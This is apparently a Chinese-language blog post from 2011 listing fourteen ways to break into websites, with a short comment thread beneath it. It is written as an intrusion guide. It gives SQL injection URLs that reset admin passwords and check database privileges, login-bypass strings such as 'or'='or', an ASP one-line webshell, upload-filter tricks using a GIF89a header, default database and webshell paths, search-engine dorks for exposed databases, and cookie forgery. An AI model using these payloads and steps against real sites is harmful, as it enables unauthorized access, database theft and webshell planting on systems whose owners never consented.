博客已经成功切换为 Wordpress! My blog has been switched to Wordpress!

入侵网站的 14 种可利用方法

技术分享 edwardfang 7年前 (2011-10-30) 80次浏览 4个评论

点击查看原图

1.上传漏洞 upfile.asp, upload.asp,upload_flash.asp ,upfile_soft.asp,upfile_softpic.asp

pS: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!
有时上传不一定会成功,这是因为 Cookies 不一样.我们就要用 WSockExpert 取得 Cookies.再用 DOMAIN 上传。还有一些只是检测文 件类型的,没有进行后缀名判断,这样的上传只需要把木马文件的开关加个 GIF89a 就可以通过了。而且可以上传任意文件,在 asp 和 asp.net 测试中 都可以上传。

2.注入漏洞
pS:对 MD5 密码.有时我们不是哪么容易跑出来.如果是[SQL 数据库].那么我们可以用以下命令:
http://注入网址;update admin set password=’新 MD5 密码’ where password=’旧 MD5 密码’– [admin 为表名.]
//看看是什么权限的,如果权限高的话,直接用 SQLTOOLS 进行连接就可以执行系统命令了。
http://注入网址 and 1=(Select IS_MEMBER(”db_owner”))
http://注入网址 And char(124)%2BCast(IS_MEMBER(”db_owner”) as varchar(1))%2Bchar(124)=1 ;–
//检测是否有读取某数据库的权限
http://注入网址 and 1= (Select HAS_DBACCESS(”master”))
http://注入网址 And char(124)%2BCast(HAS_DBACCESS(”master”) as varchar(1))%2Bchar(124)=1 —

3.旁注,也就是跨站
我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点。在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了。

4.暴库:把二级目录中间的/换成%5c
eg:http://www.xxx.com/myhome/otherweb… s.asp?BigClassName=职责范围 BigClassType=1
换成这样的形式提交:http://www.xxx.com/myhome%5Cotherweb… s.asp?BigClassName=职责范围 BigClassType=1
如果你能看到:’E:/ahttc040901/otherweb/dz/database/iXuEr_Studio.asa’不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。
这样的就是数据库了。下载时用 FLASHGET 换成.MDB 格式的就行.

5.绕过密码验证直接进入后台
’or’=’or’这是一个可以连接 SQL 的语名句.可以直接进入后台。我收集了一下。类似的还有:
’or’’=’ ” or “a”=”a ’) or (’a’=’a “) or (“a”=”a or 1=1– ” or ’a’=’a

6.社会工程学
这个我们都知道吧。就是猜解。猜解一些人们常用的密码,比如他的生日啊,手机号码啊。办公电话啊等等。。
EY:http://www.xxx.cn/waishi/admin
admin waishi

7.写入 ASP 格式数据库
就是一句话木马[〈%execute request(“value”)%〉 ],常用在留言本.
EY:http://www.xxx.cn/ebook/db/ebook.asp[这个就是 ASP 格式的数据库],再写入一句话木马,然后利用 ASP 后缀名的数据库进行写入木马。也提醒一下站长,MDB 数据库改为.asp 后缀也是不安全的。

8.源码利用
很多网站用的都是网上下载的源码,有的站长很懒,什么也不改。然后就上传开通网站了,像这样的网站只要知道他用的什么网站的源码做的,自己去网上下载一个,然后就有很多信息可以利用了。像数据库备份,网站后台啊,原始数据库路径啊,上传文件的路径啊等等,都可以进行利用。
EY:http://www.xxxx.edu.cn/xiaoyoulu/index.asp
这个站用的是:杰出校友录,源码我下过了,
默认数据库/webshell 路径:/database/liangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是 admin

9.默认数据库/webshell 路径利用
这样的网站很多/利人别人的 WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:网站猎手 挖掘鸡
EY:http://www.xxx.com/bbs/Databackup/dvbbs7.MDB

10.查看目录法,有一些网站可以浏览目录,可以看到目录下所有的文件。
EY:http://www.xxx.com/shop/admin/
http://www.xxx.com/babyfox/admin/%23bb%23dedsed2s/
这样我们可以找到数据库,下载不用我教吧

11.工具溢出
.asp?NewsID= /2j.asp?id=18 .asp?id=[这种方法可以取得大量的 WEBSHELL]


12.搜索引擎利用

(1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/
(2).找网站的管理后台地址:
site:xxxx.comintext:管理
site:xxxx.comintitle:管理 〈关键字很多,自已找〉
site:xxxx.cominurl:login
(3).查找 access 的数据库,mssql、mysql 的连接文件
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb

13.COOKIE 诈骗
把自己的 ID 修改成管理员的,MD5 密码也修改成他的,用桂林老兵工具可以修改 COOKIE。然后就直接登录有了网站后台管理员权限了。这个我就不多讲了

14.利用常见的漏洞,如动网 BBS
EY:http://www.xxx.com/bbs/index.asp
可以先用:dvbbs 权限提升工具,使自已成为前台管理员。
THEN,运用:动网固顶贴工具,找个固顶贴,再取得 COOKIES,这个要你自已做。我们可以用 WSockExpert 取得 Cookies/NC 包


回味依旧 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:入侵网站的 14 种可利用方法
喜欢 (0)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
(4)个小伙伴在吐槽
  1. 厉害!
    Alana2013-03-27 13:53 回复
  2. 网站有这么多漏洞,看来需要注意这些了!
    婴儿车2011-11-03 22:04 回复
  3. 试试
    欧洲房产投资2011-11-03 09:48 回复
  4. 额....{smile:12}{smile:12}{smile:12}
    企业对企业2011-10-31 10:46 回复